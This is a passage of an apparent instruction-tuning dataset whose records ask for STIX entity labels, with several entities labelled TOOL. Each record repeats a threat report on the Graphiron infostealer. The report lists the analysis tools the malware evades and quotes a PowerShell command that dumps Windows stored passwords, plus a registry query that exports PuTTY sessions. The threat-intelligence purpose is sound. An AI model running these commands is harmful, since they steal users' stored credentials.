"input": "### Entity:\nWSockExpert\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPuTTY\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nprocmon64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nprocexp64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRAMMap\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nx32dbg\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nHTTPDebuggerUI\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
